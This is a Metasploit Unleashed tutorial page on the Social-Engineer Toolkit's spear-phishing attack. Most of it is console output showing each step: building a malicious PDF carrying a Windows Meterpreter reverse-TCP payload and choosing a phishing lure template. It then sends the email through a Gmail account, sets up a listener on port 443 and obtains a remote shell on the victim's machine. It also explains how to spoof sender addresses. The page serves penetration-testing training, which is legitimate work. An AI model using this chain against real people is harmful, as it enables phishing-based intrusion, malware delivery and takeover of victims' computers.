Spear-Phishing Attack Vector
From Metasploit Unleashed
As mentioned previously, the spear phishing attack vector can be used to send targeted emails with malicious attachments. In this example, we are going to craft an attack, integrate into GMAIL and send a malicious PDF to the victim. One thing to note is that you can create and save your own templates to use for future SE attacks or you can use pre-built ones. When using SET just note that when hitting enter for defaults, it will always be port 443 as the reverse connection back and a reverse meterpreter payload.
Select from the menu: 1. Spear-Phishing Attack Vectors 2. Website Attack Vectors 3. Infectious Media Generator 4. Create a Payload and Listener 5. Mass Mailer Attack 6. Teensy USB HID Attack Vector 7. SMS Spoofing Attack Vector 8. Third Party Modules 9. Update the Metasploit Framework 10. Update the Social-Engineer Toolkit 11. Help, Credits, and About 12. Exit the Social-Engineer Toolkit Enter your choice: 1 Welcome to the SET E-Mail attack method. This module allows you to specially craft email messages and send them to a large (or small) number of people with attached fileformat malicious payloads. If you want to spoof your email address, be sure "Sendmail" is installed (it is installed in BT) and change the config/set_config SENDMAIL=OFF flag to SENDMAIL=ON. There are two options, one is getting your feet wet and letting SET do everything for you (option 1), the second is to create your own FileFormat payload and use it in your own attack. Either way, good luck and enjoy! 1. Perform a Mass Email Attack 2. Create a FileFormat Payload 3. Create a Social-Engineering Template 4. Return to Main Menu Enter your choice: 1 Select the file format exploit you want. The default is the PDF embedded EXE. ********** PAYLOADS ********** 1. SET Custom Written DLL Hijacking Attack Vector (RAR, ZIP) 2. Adobe Flash Player 'Button' Remote Code Execution 3. Adobe CoolType SING Table 'uniqueName' Overflow 4. Adobe Flash Player 'newfunction' Invalid Pointer Use 5. Adobe Collab.collectEmailInfo Buffer Overflow 6. Adobe Collab.getIcon Buffer Overflow 7. Adobe JBIG2Decode Memory Corruption Exploit 8. Adobe PDF Embedded EXE Social Engineering 9. Adobe util.printf() Buffer Overflow 10. Custom EXE to VBA (sent via RAR) (RAR required) 11. Adobe U3D CLODProgressiveMeshDeclaration Array Overrun 12. Adobe PDF Embedded EXE Social Engineering (NOJS) Enter the number you want (press enter for default): 1 1. Windows Reverse TCP Shell 2. Windows Meterpreter Reverse_TCP 3. Windows Reverse VNC 4. Windows Reverse TCP Shell (x64) 5. Windows Meterpreter Reverse_TCP (X64) 6. Windows Shell Bind_TCP (X64) Enter the payload you want (press enter for default): [*] Windows Meterpreter Reverse TCP selected. Enter the port to connect back on (press enter for default): [*] Defaulting to port 443... [*] Generating fileformat exploit... [*] Please wait while we load the module tree... [*] Started reverse handler on 172.16.32.129:443 [*] Creating 'template.pdf' file... [*] Generated output file /pentest/exploits/set/src/program_junk/template.pdf [*] Payload creation complete. [*] All payloads get sent to the src/msf_attacks/template.pdf directory [*] Payload generation complete. Press enter to continue. As an added bonus, use the file-format creator in SET to create your attachment. Right now the attachment will be imported with filename of 'template.whatever' Do you want to rename the file? example Enter the new filename: moo.pdf 1. Keep the filename, I don't care. 2. Rename the file, I want to be cool. Enter your choice (enter for default): 1 Keeping the filename and moving on. Social Engineer Toolkit Mass E-Mailer There are two options on the mass e-mailer, the first would be to send an email to one individual person. The second option will allow you to import a list and send it to as many people as you want within that list. What do you want to do: 1. E-Mail Attack Single Email Address 2. E-Mail Attack Mass Mailer 3. Return to main menu. Enter your choice: 1 Do you want to use a predefined template or craft a one time email template. 1. Pre-Defined Template 2. One-Time Use Email Template Enter your choice: 1 Below is a list of available templates: 1: Baby Pics 2: Strange internet usage from your computer 3: New Update 4: LOL...have to check this out... 5: Dan Brown's Angels & Demons 6: Computer Issue 7: Status Report Enter the number you want to use: 7 Enter who you want to send email to: kennedyd013@gmail.com What option do you want to use? 1. Use a GMAIL Account for your email attack. 2. Use your own server or open relay Enter your choice: 1 Enter your GMAIL email address: kennedyd013@gmail.com Enter your password for gmail (it will not be displayed back to you): SET has finished delivering the emails. Do you want to setup a listener yes or no: yes [-] *** [-] * WARNING: No database support: String User Disabled Database Support [-] *** | | _) | __ `__ \ _ \ __| _` | __| __ \ | _ \ | __| | | | __/ | ( |\__ \ | | | ( | | | _| _| _|\___|\__|\__,_|____/ .__/ _|\___/ _|\__| _| =[ metasploit v3.4.2-dev [core:3.4 api:1.0] + -- --=[ 588 exploits - 300 auxiliary + -- --=[ 224 payloads - 27 encoders - 8 nops =[ svn r10268 updated today (2010.09.09) resource (src/program_junk/meta_config)> use exploit/multi/handler resource (src/program_junk/meta_config)> set PAYLOAD windows/meterpreter/reverse_tcp PAYLOAD => windows/meterpreter/reverse_tcp resource (src/program_junk/meta_config)> set LHOST 172.16.32.129 LHOST => 172.16.32.129 resource (src/program_junk/meta_config)> set LPORT 443 LPORT => 443 resource (src/program_junk/meta_config)> set ENCODING shikata_ga_nai ENCODING => shikata_ga_nai resource (src/program_junk/meta_config)> set ExitOnSession false ExitOnSession => false resource (src/program_junk/meta_config)> exploit -j [*] Exploit running as background job. msf exploit(handler) > [*] Started reverse handler on 172.16.32.129:443 [*] Starting the payload handler... msf exploit(handler) >
Once the attack is all setup, the victim opens the email and opens the PDF up:
As soon as the victim opens the attachment, a shell is presented back to us:
[*] Sending stage (748544 bytes) to 172.16.32.131 [*] Meterpreter session 1 opened (172.16.32.129:443 -> 172.16.32.131:1139) at Thu Sep 09 09:58:06 -0400 2010 msf exploit(handler) > sessions -i 1 [*] Starting interaction with 1... meterpreter > shell Process 3940 created. Channel 1 created. Microsoft Windows XP [Version 5.1.2600] (C) Copyright 1985-2001 Microsoft Corp. C:\Documents and Settings\Administrator\Desktop>
The spear-phishing attack can send to multiple people or to individuals, it integrates into Google mail, and can be completely customized based on your needs for the attack vector. Overall this is very effective for email spear-phishing.
Beyond Metasploit > Social-Engineering Toolkit (SET) > Spear-Phishing Attack
Getting Started | Menu Based Driving | Spear-Phishing Attack | Java Applet Attack | Metaspoit Browser Exploit | Credential Harvester Attack | Tabnabbing Attack | Man Left In The Middle Attack | Web Jacking Attack | Multi-Attack Web Vector | Infectious Media Generator | Teensy USB HID Attack | SMS Spoofing Attack | SET Automation | SET Web-Interface | SET Module Development | SET FAQ
